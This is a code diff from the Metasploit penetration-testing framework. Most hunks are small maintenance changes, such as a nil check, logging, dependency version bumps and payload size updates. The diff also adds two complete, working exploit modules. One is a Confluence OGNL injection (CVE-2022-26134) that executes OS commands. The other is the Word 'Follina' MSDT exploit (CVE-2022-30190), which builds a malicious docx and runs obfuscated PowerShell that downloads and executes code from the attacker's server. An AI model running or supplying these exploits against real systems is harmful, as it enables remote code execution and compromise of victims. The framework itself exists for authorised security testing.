       query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
       output = run_sql("select #{query_string}")
+      return false if output.nil?
       (@encoder ? @encoder[:decode].call(output) : output) == random_string
     end
 

lib/rex/post/meterpreter/pivot.rb

@@ -85,6 +85,7 @@ class Pivot
     c = Class.new(::Msf::Payload)
     c.include(::Msf::Payload::Stager)
     c.include(::Msf::Payload::TransportConfig)
+    c.include(::Msf::Sessions::MeterpreterOptions)
 
     # TODO: add more platforms
     case opts[:platform]

lib/rex/post/meterpreter/ui/console.rb

@@ -110,6 +110,7 @@ class Console
       self.client.kill
     rescue  ::Exception => e
       log_error("Error running command #{method}: #{e.class} #{e}")
+      elog(e)
     end
   end
 

lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb

@@ -1337,13 +1337,14 @@ class Console::CommandDispatcher::Core
         if (client.core.use(modulenameprovided) == true)
           add_extension_client(md)
 
-          if md == 'stdapi' && !client.exploit_datastore['AutoLoadStdapi'] && client.exploit_datastore['AutoSystemInfo']
+          if md == 'stdapi' && (client.exploit_datastore && !client.exploit_datastore['AutoLoadStdapi'] && client.exploit_datastore['AutoSystemInfo'])
             client.load_session_info
           end
         end
       rescue => ex
         print_line
         log_error("Failed to load extension: #{ex.message}")
+        elog(ex)
         if ex.kind_of?(ExtensionLoadError) && ex.name
           # MetasploitPayloads and MetasploitPayloads::Mettle do things completely differently, build an array of
           # suggestion keys (binary_suffixes and Mettle build-tuples)

metasploit-framework.gemspec

@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.87'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.93'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
   # Needed by msfgui and other rpc components
@@ -224,6 +224,7 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'eventmachine'
 
   spec.add_runtime_dependency 'faraday'
+  spec.add_runtime_dependency 'faraday-retry'
 
   # Required for windows terminal colors as of Ruby 3.0
   spec.add_runtime_dependency 'win32api'

modules/auxiliary/gather/impersonate_ssl.rb

@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
         OptPath.new('PRIVKEY', [false, 'Sign the cert with your own CA private key', nil]),
         OptString.new('PRIVKEY_PASSWORD', [false, 'Password for private key specified in PRIV_KEY (if applicable)', nil]),
         OptPath.new('CA_CERT', [false, 'CA Public certificate', nil]),
-        OptString.new('ADD_CN', [false, 'Add CN to match spoofed site name (e.g. *.example.com)', nil])
+        OptString.new('ADD_CN', [false, 'Add CN to match spoofed site name (e.g. *.example.com)', nil]),
+        OptString.new('ADD_SAN', [false, 'Add SAN entries to certificate (e.g. alt.example.com,127.0.0.1)', nil])
       ]
     )
 
@@ -180,6 +181,17 @@ class MetasploitModule < Msf::Auxiliary
       ef.create_extension('subjectKeyIdentifier', 'hash'),
     ]
 
+    # Add additional SAN entries to the new cert. See https://support.f5.com/csp/article/K13471
+    # for an example of how this added SAN field is expected to look like in a certificate.
+    if !datastore['ADD_SAN'].nil? && !datastore['ADD_SAN'].empty?
+      sans = datastore['ADD_SAN'].to_s.split(/,/)
+      sans.map! do |san|
+        san = (san =~ Resolv::IPv4::Regex || san =~ Resolv::IPv6::Regex) ? "IP:#{san}" : "DNS:#{san}"
+      end
+      new_cert.add_extension(ef.create_extension('subjectAltName', sans.join(','), false))
+      print_status("Adding #{datastore['ADD_SAN']} to the certificate subject alternative names")
+    end
+
     if !datastore['PRIVKEY'].nil? && !datastore['PRIVKEY'].empty?
       new_cert.sign(ca_key, OpenSSL::Digest.new(hashtype))
       new_key = ca_key # Set for file output

modules/auxiliary/server/capture/smb.rb

@@ -17,9 +17,10 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %q{
         This module provides a SMB service that can be used to capture the challenge-response
         password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.
-        Responses sent by this service have by default a random 8 byte challenge string
-        of format `\x11\x22\x33\x44\x55\x66\x77\x88`, allowing for easy cracking using
-        Cain & Abel (NTLMv1) or John the ripper (with jumbo patch).
+        Responses sent by this service by default use a random 8 byte challenge string.
+        A specific value (such as `1122334455667788`) can be set using the CHALLENGE option,
+        allowing for easy cracking using Cain & Abel (NTLMv1) or John the Ripper
+        (with jumbo patch).
 
         To exploit this, the target system must try to authenticate to this
         module. One way to force an SMB authentication attempt is by embedding

modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb

@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Confluence Namespace OGNL Injection',
+        'Description' => %q{
+          This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to
+          evaluate an OGNL expression resulting in OS command execution.
+        },
+        'Author' => [
+          'Unknown', # exploited in the wild
+          'bturner-r7',
+          'jbaines-r7',
+          'Spencer McIntyre'
+        ],
+        'References' => [
+          ['CVE', '2021-26084'],
+          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
+          ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
+          ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
+          ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']
+        ],
+        'DisclosureDate' => '2022-06-02',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    version = get_confluence_version
+    return CheckCode::Unknown unless version
+
+    vprint_status("Detected Confluence version: #{version}")
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
+
+    return CheckCode::Unknown unless res
+
+    unless res && res.headers.include?(header)
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def get_confluence_version
+    return @confluence_version if @confluence_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.action')
+    )
+    return nil unless res&.code == 200
+
+    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
+    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/
+
+    @confluence_version = Rex::Version.new(Regexp.last_match(1))
+    @confluence_version
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl(cmd, header: header)
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def inject_ognl(cmd, header:)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
+      'headers' => { header => cmd }
+    )
+  end
+
+  def ognl_payload(_cmd, header:)
+    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader("#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.Runtime.getRuntime().exec([
+                #{target['Platform'] == 'win' ? "'cmd.exe','/c'" : "'/bin/sh','-c'"},
+                com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')
+              ]); '#{Faker::Internet.uuid}'")
+            )
+      }
+    OGNL
+  end
+end

modules/exploits/multi/http/php_fpm_rce.rb

@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def repeat_operation(op, opts = {})
     datastore['OperationMaxRetries'].times do |i|
       vprint_status("#{op}: try ##{i + 1}")
-      res = opts.empty? ? send(op) : send(op, opts)
+      res = opts.empty? ? send(op) : send(op, **opts)
       return res if res
     end
     nil

modules/exploits/windows/fileformat/word_msdtjs_rce.rb

@@ -0,0 +1,225 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Office Word MSDTJS',
+        'Description' => %q{
+          This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template
+          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.
+        },
+        'References' => [
+          ['CVE', '2022-30190'],
+          ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],
+          ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],
+          ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],
+          ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],
+          ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],
+          ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']
+        ],
+        'Author' => [
+          'nao sec', # Original disclosure.
+          'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity
+        ],
+        'DisclosureDate' => '2022-05-29',
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => false,
+          'FILENAME' => 'msf.docx',
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+          'SRVHOST' => Rex::Socket.source_address('1.2.3.4')
+        },
+        'Targets' => [
+          [ 'Microsoft Office Word', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Follina'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [UNRELIABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
+      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
+    ])
+  end
+
+  def get_file_in_docx(fname)
+    i = @docx.find_index { |item| item[:fname] == fname }
+
+    unless i
+      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
+    end
+
+    @docx.fetch(i)[:data]
+  end
+
+  def get_template_path
+    datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')
+  end
+
+  def generate_html
+    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
+
+    dummy = ''
+    (1..random_int(61, 100)).each do |_n|
+      dummy += '//' + rand_text_alpha(100) + "\n"
+    end
+
+    cmd = Rex::Text.encode_base64("IEX(New-Object Net.WebClient).downloadString('#{uri}')")
+
+    js_content = "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\";"
+    if datastore['OBFUSCATE']
+      print_status('Obfuscate JavaScript content')
+
+      js_content = Rex::Exploitation::JSObfu.new js_content
+      js_content = js_content.obfuscate(memory_sensitive: false)
+    end
+
+    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'
+    html += "\n#{dummy}\n#{js_content}\n"
+    html += '</script></body></html>'
+
+    html
+  end
+
+  def inject_docx
+    document_xml = get_file_in_docx('word/document.xml')
+    unless document_xml
+      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')
+    end
+
+    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')
+    unless document_xml_rels
+      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
+    end
+
+    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    @docx.each do |entry|
+      case entry[:fname]
+      when 'word/_rels/document.xml.rels'
+        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}&#x21;")
+      end
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * '/'
+
+    new_str = new_str.gsub!('//', '/') while new_str.index('//')
+
+    # makes sure there's a starting slash
+    unless new_str.start_with?('/')
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def on_request_uri(cli, request)
+    header_html = {
+      'Access-Control-Allow-Origin' => '*',
+      'Access-Control-Allow-Methods' => 'GET, POST',
+      'Cache-Control' => 'no-store, no-cache, must-revalidate',
+      'Content-Type' => 'text/html; charset=UTF-8'
+    }
+
+    if request.method.eql? 'HEAD'
+      send_response(cli, '', header_html)
+    elsif request.method.eql? 'OPTIONS'
+      response = create_response(501, 'Unsupported Method')
+      response['Content-Type'] = 'text/html'
+      response.body = ''
+
+      cli.send_response(response)
+    elsif request.raw_uri.to_s.end_with? '.html'
+      print_status('Sending HTML Payload')
+
+      send_response_html(cli, generate_html, header_html)
+    elsif request.raw_uri.to_s.end_with? '.ps1'
+      print_status('Sending PowerShell Payload')
+
+      send_response(cli, @payload_data, header_html)
+    end
+  end
+
+  def pack_docx
+    @docx.each do |entry|
+      if entry[:data].is_a?(Nokogiri::XML::Document)
+        entry[:data] = entry[:data].to_s
+      end
+    end
+
+    Msf::Util::EXE.to_zip(@docx)
+  end
+
+  def primer
+    print_status('Generating a malicious docx file')
+
+    @proto = (datastore['SSL'] ? 'https' : 'http')
+
+    template_path = get_template_path
+    unless File.extname(template_path).downcase.end_with?('.docx')
+      fail_with(Failure::BadConfig, 'Template is not a docx file!')
+    end
+
+    print_status("Using template '#{template_path}'")
+    @docx = unpack_docx(template_path)
+
+    print_status('Injecting payload in docx document')
+    inject_docx
+
+    print_status("Finalizing docx '#{datastore['FILENAME']}'")
+    file_create(pack_docx)
+
+    @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
+
+    super
+  end
+
+  def random_int(min, max)
+    rand(max - min) + min
+  end
+
+  def unpack_docx(template_path)
+    document = []
+
+    Zip::File.open(template_path) do |entries|
+      entries.each do |entry|
+        if entry.name.downcase.end_with?('.xml', '.rels')
+          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
+        elsif entry.file?
+          content = entry.get_input_stream.read
+        end
+
+        vprint_status("Parsing item from template: #{entry.name}")
+
+        document << { fname: entry.name, data: content }
+      end
+    end
+
+    document
+  end
+
+end

modules/payloads/singles/php/meterpreter_reverse_tcp.rb

@@ -7,7 +7,7 @@
 
 module MetasploitModule
 
-  CachedSize = 34792
+  CachedSize = 34854
 
   include Msf::Payload::Single
   include Msf::Payload::Php::ReverseTcp

modules/payloads/singles/python/meterpreter_bind_tcp.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 117045
+  CachedSize = 117057
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/python/meterpreter_reverse_http.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 117037
+  CachedSize = 117049
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/python/meterpreter_reverse_https.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 117037
+  CachedSize = 117049
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/python/meterpreter_reverse_tcp.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 116945
+  CachedSize = 116957
 
   include Msf::Payload::Single
   include Msf::Payload::Python

modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 175174
+  CachedSize = 175686
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_bind_tcp.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 175174
+  CachedSize = 175686
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_reverse_http.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176220
+  CachedSize = 176732
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176220
+  CachedSize = 176732
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 175174
+  CachedSize = 175686
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_reverse_tcp.rb

@@ -6,7 +6,7 @@
 
 module MetasploitModule
 
-  CachedSize = 175174
+  CachedSize = 175686
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows